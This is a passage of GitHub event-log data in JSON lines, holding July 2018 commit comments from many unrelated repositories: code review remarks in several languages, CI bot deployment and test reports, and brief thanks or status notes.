{"id":"7951645725","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29674682,"position":null,"line":null,"path":null,"commit_id":"35a55e6a0da0f5d7ad38c7a174a4a823d43fe5a3","created_at":"2018-07-11T17:50:22Z","updated_at":"2018-07-11T17:50:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-175021 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-175021\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T17:50:22Z"}
{"id":"7951646284","type":"CommitCommentEvent","actor":{"login":"aubincleme"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29674683,"position":32,"line":32,"path":"pom.xml","commit_id":"cafca7ff43e4a719178abde9aefaa0c7fb840536","created_at":"2018-07-11T17:50:28Z","updated_at":"2018-07-11T17:50:28Z","author_association":"MEMBER","body":"You should update this version when you want to release a new webjar (we want to release the v0.2, not the v0.1 which has already been released)."}},"created_at":"2018-07-11T17:50:28Z"}
{"id":"7951646859","type":"CommitCommentEvent","actor":{"login":"quintesse"},"repo":{"name":"fabric8-launcher/demo-cloud-app-creator"},"payload":{"comment":{"id":29674685,"position":5,"line":8,"path":"src/components/TemplateItem.js","commit_id":"70f2d66f00275502af8c10677ec89b0de4e46e7f","created_at":"2018-07-11T17:50:35Z","updated_at":"2018-07-11T17:50:35Z","author_association":"NONE","body":"Not that I know how to do it better but I think this shouldn't be here, right? I mean that's layout, that should go in the CSS AFAIK :) \r\n\r\n(pretending that I know anything about frontend design hehe)"}},"created_at":"2018-07-11T17:50:35Z"}
{"id":"7951648192","type":"CommitCommentEvent","actor":{"login":"Killyana"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29674689,"position":null,"line":null,"path":null,"commit_id":"3963492bec37491cd6584c3deaa23f2b5c7fb1fa","created_at":"2018-07-11T17:50:51Z","updated_at":"2018-07-11T17:50:51Z","author_association":"MEMBER","body":"I don't use any Editor anyway."}},"created_at":"2018-07-11T17:50:51Z"}
{"id":"7951657359","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"p51i/next50"},"payload":{"comment":{"id":29674709,"position":null,"line":null,"path":null,"commit_id":"19b3fa85c8a1612be5a127141fc949b95e095d4a","created_at":"2018-07-11T17:52:38Z","updated_at":"2018-07-11T17:52:38Z","author_association":"OWNER","body":"Created multidev environment [next50#ci-14](https://dashboard.pantheon.io/sites/5a4cf60c-6be0-499b-aba2-a87e5c886799#ci-14).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-14-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T17:52:38Z"}
{"id":"7951660238","type":"CommitCommentEvent","actor":{"login":"hernandev"},"repo":{"name":"utopian-io/v2.utopian.io"},"payload":{"comment":{"id":29674715,"position":24,"line":35,"path":"src/services/steem/connect/comment.js","commit_id":"6db36a4626d58a4f2b84df2bafff2727cea450ce","created_at":"2018-07-11T17:53:12Z","updated_at":"2018-07-11T17:53:12Z","author_association":"MEMBER","body":"this is being refactored"}},"created_at":"2018-07-11T17:53:12Z"}
{"id":"7951660381","type":"CommitCommentEvent","actor":{"login":"rylans"},"repo":{"name":"bharatsewani1993/getlang"},"payload":{"comment":{"id":29674718,"position":5,"line":35,"path":"profiles.go","commit_id":"41c7c7c92554004ee09250f47d6924ba2e5065bf","created_at":"2018-07-11T17:53:14Z","updated_at":"2018-07-11T17:53:14Z","author_association":"NONE","body":"Actually you may not even need to add this. This is just for detecting languages that share common scripts. But since Punjabi is the main language that uses the Gurmukhi script, you could add it to the scripts table. (see getlang.go line 42 to 54)"}},"created_at":"2018-07-11T17:53:14Z"}
{"id":"7951661936","type":"CommitCommentEvent","actor":{"login":"hernandev"},"repo":{"name":"utopian-io/v2.utopian.io"},"payload":{"comment":{"id":29674723,"position":null,"line":null,"path":null,"commit_id":"6db36a4626d58a4f2b84df2bafff2727cea450ce","created_at":"2018-07-11T17:53:31Z","updated_at":"2018-07-11T17:53:31Z","author_association":"MEMBER","body":"@mahdiyari it's being refactored right now, thanks for the reminder!"}},"created_at":"2018-07-11T17:53:31Z"}
{"id":"7951663682","type":"CommitCommentEvent","actor":{"login":"terrisgit"},"repo":{"name":"sushobhit27/pylint"},"payload":{"comment":{"id":29674728,"position":null,"line":null,"path":null,"commit_id":"ab3469ad9394d02f3c8a533f7214f687d517688b","created_at":"2018-07-11T17:53:51Z","updated_at":"2018-07-11T17:53:51Z","author_association":"NONE","body":"Thank you for this fix! When will it be released?"}},"created_at":"2018-07-11T17:53:51Z"}
{"id":"7951665079","type":"CommitCommentEvent","actor":{"login":"frnkvieira"},"repo":{"name":"vibora-io/vibora"},"payload":{"comment":{"id":29674730,"position":null,"line":null,"path":null,"commit_id":"69d4194b8282ddb8d01fc0dfabb094078fc45136","created_at":"2018-07-11T17:54:07Z","updated_at":"2018-07-11T17:54:07Z","author_association":"MEMBER","body":"I disagree and so does Black: https://github.com/ambv/black#strings\r\nAnyway, I appreciate your comment."}},"created_at":"2018-07-11T17:54:07Z"}
{"id":"7951668299","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"FantLab/FantLab-client"},"payload":{"comment":{"id":29674738,"position":39,"line":62,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/overview/WorkOverviewFragment.kt","commit_id":"36cc0555c31d8d693763d991996bcf0c3d0f1d79","created_at":"2018-07-11T17:54:41Z","updated_at":"2018-07-11T17:54:41Z","author_association":"MEMBER","body":"По идее, немного не так :) В _append_ обычно не проверяются условия\r\n```\r\nval sb = StringBuilder().append(work.type)\r\nwork.year?.let {\r\n    sb.append(\", \")\r\n    sb.append(it.toString())\r\n}\r\ntypes.text = sb\r\n```"}},"created_at":"2018-07-11T17:54:41Z"}
{"id":"7951669347","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29674740,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-11T17:54:53Z","updated_at":"2018-07-11T17:54:53Z","author_association":"OWNER","body":"Ok, I'll try to merge `typo-tests` into `n-t-roff` now. It may take some time..."}},"created_at":"2018-07-11T17:54:53Z"}
{"id":"7951674974","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"FantLab/FantLab-client"},"payload":{"comment":{"id":29674751,"position":null,"line":null,"path":null,"commit_id":"36cc0555c31d8d693763d991996bcf0c3d0f1d79","created_at":"2018-07-11T17:55:56Z","updated_at":"2018-07-11T17:55:56Z","author_association":"MEMBER","body":"Крутяк! 👍 "}},"created_at":"2018-07-11T17:55:56Z"}
{"id":"7951675539","type":"CommitCommentEvent","actor":{"login":"alexvilper"},"repo":{"name":"AutoMapper/AutoMapper"},"payload":{"comment":{"id":29674752,"position":30,"line":604,"path":"src/AutoMapper/Execution/TypeMapPlanBuilder.cs","commit_id":"923468efc39a233d3990afcb2737707b76a08bb6","created_at":"2018-07-11T17:56:02Z","updated_at":"2018-07-11T17:56:02Z","author_association":"NONE","body":"I use the [ComObjectMapper.cs](https://gist.github.com/kbkk/437d92af4f3fc72ee9040f633d0ce988) , and it's calling this MapExpression method that was deleted from here. It is moved to another class? If not, how can we replace it in the code?\r\n\r\n```\r\npublic Expression MapExpression(IConfigurationProvider configurationProvider, ProfileMap profileMap, PropertyMap propertyMap, Expression sourceExpression, Expression destExpression, Expression contextExpression)\r\n        {\r\n            var sourceObject = ExpressionFactory.ToObject(sourceExpression);\r\n            var sourceType = GetComObjectType(sourceObject);\r\n\r\n            return **TypeMapPlanBuilder.MapExpression**(configurationProvider, profileMap,\r\n                    new TypePair(sourceType, destExpression.Type),\r\n                    sourceExpression,\r\n                    contextExpression,\r\n                    propertyMap,\r\n                    destExpression\r\n                );\r\n        }\r\n\r\n```\r\n\r\nThanks!\r\nAlex"}},"created_at":"2018-07-11T17:56:02Z"}
{"id":"7951679349","type":"CommitCommentEvent","actor":{"login":"ldct"},"repo":{"name":"ethereum/pyethereum"},"payload":{"comment":{"id":29674759,"position":null,"line":null,"path":null,"commit_id":"28ac6d07dae776547ebb9ac08fb220785f53d838","created_at":"2018-07-11T17:56:43Z","updated_at":"2018-07-11T17:56:43Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-11T17:56:43Z"}
{"id":"7951684752","type":"CommitCommentEvent","actor":{"login":"Sobaka115"},"repo":{"name":"Sobaka115/Tests"},"payload":{"comment":{"id":29674776,"position":null,"line":null,"path":null,"commit_id":"2d6448cd0d1a0aca65cd912a8706d09fce172e16","created_at":"2018-07-11T17:57:46Z","updated_at":"2018-07-11T17:57:46Z","author_association":"OWNER","body":"jkbhjhg"}},"created_at":"2018-07-11T17:57:46Z"}
{"id":"7951687847","type":"CommitCommentEvent","actor":{"login":"AlexanderSher"},"repo":{"name":"Microsoft/PTVS"},"payload":{"comment":{"id":29674787,"position":5,"line":170,"path":"Python/Product/Analysis/PythonAnalyzer.cs","commit_id":"997c9ad0019487b3e807771954e091e269799a53","created_at":"2018-07-11T17:58:19Z","updated_at":"2018-07-11T17:58:19Z","author_association":"CONTRIBUTOR","body":"`CancellationToken token = default(CancellationToken)`"}},"created_at":"2018-07-11T17:58:19Z"}
{"id":"7951690678","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29674791,"position":null,"line":null,"path":null,"commit_id":"cfe8c2942a158ce6291d1c2964728aef12abe436","created_at":"2018-07-11T17:58:49Z","updated_at":"2018-07-11T17:58:49Z","author_association":"COLLABORATOR","body":"I added the column headers into an ArrayList, then added the list to the xCol and yCol ListSingleSelection variables. This reads them in as options for the user to choose based on what they've labeled their columns rather than having predetermined options (I'd previously only had placeholders)."}},"created_at":"2018-07-11T17:58:49Z"}
{"id":"7951697431","type":"CommitCommentEvent","actor":{"login":"gcttong"},"repo":{"name":"phac-nml/bio_hansel"},"payload":{"comment":{"id":29674807,"position":15,"line":15,"path":"bio_hansel/scripts/find_cluster.py","commit_id":"9ec336263546c384d029c5ab5e17205de324f9e5","created_at":"2018-07-11T18:00:05Z","updated_at":"2018-07-11T18:00:05Z","author_association":"COLLABORATOR","body":"Fixed: addressed in commit f84c6d74938ecf3de033c714f89b2dddbd010c06"}},"created_at":"2018-07-11T18:00:05Z"}
{"id":"7951701308","type":"CommitCommentEvent","actor":{"login":"fenixbones"},"repo":{"name":"franckiito/BeLife"},"payload":{"comment":{"id":29674819,"position":null,"line":null,"path":null,"commit_id":"9c47010de0a8bc4ef4de42ed5d7313943f37295c","created_at":"2018-07-11T18:00:46Z","updated_at":"2018-07-11T18:00:46Z","author_association":"NONE","body":"tienes la base de datos que puedas subir plz"}},"created_at":"2018-07-11T18:00:46Z"}
{"id":"7951702226","type":"CommitCommentEvent","actor":{"login":"michaelcgorman"},"repo":{"name":"iwu/my.iwu.edu"},"payload":{"comment":{"id":29674821,"position":null,"line":null,"path":null,"commit_id":"cdf363635fc701f2276bcad630d9269757371e4d","created_at":"2018-07-11T18:00:56Z","updated_at":"2018-07-11T18:00:56Z","author_association":"MEMBER","body":"Can't deploy at the moment; waiting for resolution on the Career Center proposal."}},"created_at":"2018-07-11T18:00:56Z"}
{"id":"7951708183","type":"CommitCommentEvent","actor":{"login":"diegozea"},"repo":{"name":"JuliaStats/StatsBase.jl"},"payload":{"comment":{"id":29674833,"position":2,"line":1,"path":"REQUIRE","commit_id":"7011b19028c0aa0ce2e7751ff926c1a381883b6b","created_at":"2018-07-11T18:02:01Z","updated_at":"2018-07-11T18:02:01Z","author_association":"CONTRIBUTOR","body":"@ararslan Is there a reason to not support 0.7-beta ?"}},"created_at":"2018-07-11T18:02:01Z"}
{"id":"7951710584","type":"CommitCommentEvent","actor":{"login":"lukaskubanek"},"repo":{"name":"maicki/OrderedDictionary"},"payload":{"comment":{"id":29674841,"position":null,"line":null,"path":null,"commit_id":"f431034702c09e33176097db1fb9a1f85e61513f","created_at":"2018-07-11T18:02:27Z","updated_at":"2018-07-11T18:02:27Z","author_association":"NONE","body":"I see. Have you tested version 2.1.0? Is it working according to your needs?"}},"created_at":"2018-07-11T18:02:27Z"}
{"id":"7951716864","type":"CommitCommentEvent","actor":{"login":"blueriver97"},"repo":{"name":"blueriver97/blueriver97.github.io"},"payload":{"comment":{"id":29674856,"position":null,"line":null,"path":null,"commit_id":"8dafbb2a043e44bfe1c1a7b2b96a67cc4ef8fb28","created_at":"2018-07-11T18:03:40Z","updated_at":"2018-07-11T18:03:40Z","author_association":"OWNER","body":"시작"}},"created_at":"2018-07-11T18:03:40Z"}
{"id":"7951719995","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29674863,"position":null,"line":null,"path":null,"commit_id":"de043f2afc088ee1c358f0e18ef9bdb2226756bf","created_at":"2018-07-11T18:04:18Z","updated_at":"2018-07-11T18:04:18Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T18:04:18Z"}
{"id":"7951728222","type":"CommitCommentEvent","actor":{"login":"honemepool"},"repo":{"name":"github/pages-gem"},"payload":{"comment":{"id":29674872,"position":null,"line":null,"path":null,"commit_id":"4b016f6f99ea8b4c5dbb739eb14c3608d93b3904","created_at":"2018-07-11T18:05:59Z","updated_at":"2018-07-11T18:05:59Z","author_association":"NONE","body":"Thank "}},"created_at":"2018-07-11T18:05:59Z"}
{"id":"7951735496","type":"CommitCommentEvent","actor":{"login":"adriangmemorandum"},"repo":{"name":"rediris-es/simplesamlphp-module-idpinstaller"},"payload":{"comment":{"id":29674887,"position":null,"line":null,"path":null,"commit_id":"8b59e4354ddbc14606b1cbd8f85c28f8fa3da353","created_at":"2018-07-11T18:07:29Z","updated_at":"2018-07-11T18:07:29Z","author_association":"COLLABORATOR","body":"Ok, espero a tu confirmación y añado el botón para copiar a portapapeles si lo estimas oportuno."}},"created_at":"2018-07-11T18:07:29Z"}
{"id":"7951737355","type":"CommitCommentEvent","actor":{"login":"samuelmale"},"repo":{"name":"openmrs/openmrs-module-legacyui"},"payload":{"comment":{"id":29674893,"position":null,"line":null,"path":null,"commit_id":"18124e8d6c126d411464c168cff5a9fefbde7edd","created_at":"2018-07-11T18:07:52Z","updated_at":"2018-07-11T18:07:52Z","author_association":"CONTRIBUTOR","body":"The easiest way to handle this is to create another branch @mozzy11 "}},"created_at":"2018-07-11T18:07:52Z"}
{"id":"7951738084","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29674895,"position":86,"line":375,"path":"ArgusWebServices/src/main/java/com/salesforce/dva/argus/ws/resources/UserResources.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T18:08:02Z","updated_at":"2018-07-11T18:08:02Z","author_association":"NONE","body":"We don't need this service. We can do the same check in /authorize web service and redirect directly to grafana if user has already authorized grafana application, else go to the UI. UI becomes simple, it always asks for approval."}},"created_at":"2018-07-11T18:08:02Z"}
{"id":"7951740918","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29674901,"position":null,"line":null,"path":null,"commit_id":"435bcc79d7b859e645f4656129917ba167c5dd41","created_at":"2018-07-11T18:08:38Z","updated_at":"2018-07-11T18:08:38Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-675](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-675).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-675-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T18:08:38Z"}
{"id":"7951744117","type":"CommitCommentEvent","actor":{"login":"adriangmemorandum"},"repo":{"name":"rediris-es/simplesamlphp-module-idpinstaller"},"payload":{"comment":{"id":29674913,"position":null,"line":null,"path":null,"commit_id":"0945e6baddef9425b3ccca29a4100b066eaf64ad","created_at":"2018-07-11T18:09:18Z","updated_at":"2018-07-11T18:09:18Z","author_association":"COLLABORATOR","body":"Listas las modificaciones que indicas: https://github.com/rediris-es/simplesamlphp-module-idpinstaller/commit/736d499a5f49725a5030036abc56152f0b317813\r\n\r\nLo he probado y funciona OK."}},"created_at":"2018-07-11T18:09:18Z"}
{"id":"7951745886","type":"CommitCommentEvent","actor":{"login":"Remorax"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29674918,"position":52,"line":52,"path":"pom.xml","commit_id":"cafca7ff43e4a719178abde9aefaa0c7fb840536","created_at":"2018-07-11T18:09:41Z","updated_at":"2018-07-11T18:09:41Z","author_association":"COLLABORATOR","body":"@aubincleme alright, so I'll just add the hash of this commit because this is the latest version, okay?"}},"created_at":"2018-07-11T18:09:41Z"}
{"id":"7951746656","type":"CommitCommentEvent","actor":{"login":"GBCoin1"},"repo":{"name":"GBCoin1/tokenbase"},"payload":{"comment":{"id":29674921,"position":null,"line":null,"path":null,"commit_id":"2ca9244aa2280baa00d3f1859d8da729c48defef","created_at":"2018-07-11T18:09:50Z","updated_at":"2018-07-11T18:09:50Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-11T18:09:50Z"}
{"id":"7951747962","type":"CommitCommentEvent","actor":{"login":"RaguSubedi"},"repo":{"name":"RaguSubedi/Loan_Prediction"},"payload":{"comment":{"id":29674924,"position":null,"line":null,"path":null,"commit_id":"022d6d50d35d172fb1e6f4c18eb025ad04d1809e","created_at":"2018-07-11T18:10:06Z","updated_at":"2018-07-11T18:10:06Z","author_association":"OWNER","body":"In this case Study I will Learn everything such as : Not \"In this case Study **u** will Learn everything such as :\r\n"}},"created_at":"2018-07-11T18:10:06Z"}
{"id":"7951748826","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"bitcoin-wallet/bitcoin-wallet"},"payload":{"comment":{"id":29674925,"position":null,"line":null,"path":null,"commit_id":"bcb18bdef582455fe96ba266d52d3873fbe4cd4a","created_at":"2018-07-11T18:10:16Z","updated_at":"2018-07-11T18:10:16Z","author_association":"NONE","body":"bcb18bd"}},"created_at":"2018-07-11T18:10:16Z"}
{"id":"7951750344","type":"CommitCommentEvent","actor":{"login":"AlexStory"},"repo":{"name":"AlexStory/fluentcli"},"payload":{"comment":{"id":29674929,"position":null,"line":null,"path":null,"commit_id":"37778420c0c2f180a957e47059620eb4de891d6f","created_at":"2018-07-11T18:10:32Z","updated_at":"2018-07-11T18:10:32Z","author_association":"OWNER","body":"fixes #3 "}},"created_at":"2018-07-11T18:10:32Z"}
{"id":"7951753418","type":"CommitCommentEvent","actor":{"login":"DarkoBomer"},"repo":{"name":"DarkoBomer/SummerHolidayProject"},"payload":{"comment":{"id":29674933,"position":null,"line":null,"path":null,"commit_id":"77585cfb90cfc171949ab507876f07f608caf4fe","created_at":"2018-07-11T18:11:11Z","updated_at":"2018-07-11T18:11:11Z","author_association":"OWNER","body":"Integrate MetalAR (Draw textures on display and apply MPSFilter simultaneously)"}},"created_at":"2018-07-11T18:11:11Z"}
{"id":"7951753444","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29674934,"position":null,"line":null,"path":null,"commit_id":"5f12b5984c19aa3158069330632be1bedec6acf7","created_at":"2018-07-11T18:11:11Z","updated_at":"2018-07-11T18:11:11Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-181110 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-181110\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T18:11:11Z"}
{"id":"7951755928","type":"CommitCommentEvent","actor":{"login":"andrzej3393"},"repo":{"name":"RKJO/room_app"},"payload":{"comment":{"id":29674938,"position":31,"line":70,"path":"room_service/room_rents/views.py","commit_id":"f21b83478171763bd92a5f97eba15519cb400cfb","created_at":"2018-07-11T18:11:40Z","updated_at":"2018-07-11T18:11:40Z","author_association":"COLLABORATOR","body":"Najprościej by było zrzutować obiekt datetime do stringa (czyli `str(reservation.date)`), ale jeśli chcesz spróbować czegoś ciekawszego to polecam `strftime`. Przykłady tutaj: https://www.guru99.com/date-time-and-datetime-classes-in-python.html#4 dokumentacja tutaj: https://docs.python.org/3/library/datetime.html#strftime-and-strptime-behavior"}},"created_at":"2018-07-11T18:11:40Z"}
{"id":"7951755962","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29674939,"position":null,"line":null,"path":null,"commit_id":"b8163aa823feb21ab3f3d5e46330cd3d569fd75c","created_at":"2018-07-11T18:11:40Z","updated_at":"2018-07-11T18:11:40Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - i386-Windows-7-VisualStudio-14: OK (2917 of 2926 tests passed, 16 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 13 tests had: EIO diffs.\n * 4 tests had: ESO small diffs.\n * 4 tests had: Table small diffs.\n * 1 test had: BND diffs.\n * 9 tests had: ESO big diffs.\n * 7 tests had: Table big diffs.\n * 2 tests had: MTD diffs.\n * 4 tests had: MTR big diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 614\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.69%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T18:11:40Z"}
{"id":"7951760296","type":"CommitCommentEvent","actor":{"login":"Royalgamer06"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":29674952,"position":null,"line":null,"path":null,"commit_id":"adbf1d47a77d52a0f3854e557b5a3d0c90f8762a","created_at":"2018-07-11T18:12:32Z","updated_at":"2018-07-11T18:12:32Z","author_association":"NONE","body":"Thanks a lot! 👍 \r\nDon't you think it's good though, to check for the 10240⁢ character limit first?"}},"created_at":"2018-07-11T18:12:32Z"}
{"id":"7951760784","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29674954,"position":null,"line":null,"path":null,"commit_id":"5fbbfc0d9547805c123320c735d130937a801285","created_at":"2018-07-11T18:12:38Z","updated_at":"2018-07-11T18:12:38Z","author_association":"MEMBER","body":"`selected` is both a field variable and a signal. That is the underlying problem. I am interested in finding out how this manifested as a problem. Commenting it out would suggest the signal is not meant to be emitted or used anywhere? If that's case, why not just remove the signal? Name clashes would be resolved."}},"created_at":"2018-07-11T18:12:38Z"}
{"id":"7951765110","type":"CommitCommentEvent","actor":{"login":"DoctorMcKay"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":29674965,"position":null,"line":null,"path":null,"commit_id":"adbf1d47a77d52a0f3854e557b5a3d0c90f8762a","created_at":"2018-07-11T18:13:28Z","updated_at":"2018-07-11T18:13:28Z","author_association":"OWNER","body":"Meh. If you're over the limit, it won't work. If the limit ever gets changed on Steam's side, I won't have to update it."}},"created_at":"2018-07-11T18:13:28Z"}
{"id":"7951765544","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29674966,"position":null,"line":null,"path":null,"commit_id":"3f910a8aac3b72a7b8d77e39967808432a57b42c","created_at":"2018-07-11T18:13:33Z","updated_at":"2018-07-11T18:13:33Z","author_association":"COLLABORATOR","body":"<h3>fix broken links in docs (#2673)</h3>\n\nPreview: <strong><a href='https://18301-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18301-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18301-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T18:13:33Z"}
{"id":"7951767269","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29674968,"position":null,"line":null,"path":null,"commit_id":"ccf2cf307f5de8ccb6e46181b7087d40a08de7d7","created_at":"2018-07-11T18:13:55Z","updated_at":"2018-07-11T18:13:55Z","author_association":"COLLABORATOR","body":"<h3>set tabIndex=-1 on disabled buttons (#2672)</h3>\n\nPreview: <strong><a href='https://18302-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18302-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18302-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T18:13:55Z"}
{"id":"7951771920","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29674975,"position":null,"line":null,"path":null,"commit_id":"6b151344ac0a20eea12febe2b7b1f9f20c62deb4","created_at":"2018-07-11T18:14:52Z","updated_at":"2018-07-11T18:14:52Z","author_association":"COLLABORATOR","body":"Puzzle `236-a96a2aaa` discovered in   [`docker/images/node/Dockerfile`](  https://github.com/fidals/stroyprombeton/blob/master/docker/images/node/Dockerfile)   and submitted as #245. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T18:14:52Z"}
{"id":"7951772143","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29674977,"position":null,"line":null,"path":null,"commit_id":"6b151344ac0a20eea12febe2b7b1f9f20c62deb4","created_at":"2018-07-11T18:14:55Z","updated_at":"2018-07-11T18:14:55Z","author_association":"COLLABORATOR","body":"Puzzle `236-e4f4cc6e` discovered in   [`docker/docker-compose.yml`](  https://github.com/fidals/stroyprombeton/blob/master/docker/docker-compose.yml)   and submitted as #246. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T18:14:55Z"}
{"id":"7951776081","type":"CommitCommentEvent","actor":{"login":"g5v991x"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29674991,"position":null,"line":null,"path":null,"commit_id":"5fbbfc0d9547805c123320c735d130937a801285","created_at":"2018-07-11T18:15:42Z","updated_at":"2018-07-11T18:15:42Z","author_association":"CONTRIBUTOR","body":"open a point cloud file via plot2D, and click on a point triggers the error. I feel it is missing something but i do not remember what is the exact performance of the program before. Maybe it is totally fine...\n\n> On Jul 11, 2018, at 1:12 PM, shadow_walker <notifications@github.com> wrote:\n> \n> selected is both a field variable and a signal. That is the underlying problem. I am interested in finding out how this manifested as a problem. Commenting it out would suggest the signal is not meant to be emitted or used anywhere? If that's case, why not just remove the signal? Name clashes would be resolved.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/cryoem/eman2/commit/5fbbfc0d9547805c123320c735d130937a801285#commitcomment-29674954>, or mute the thread 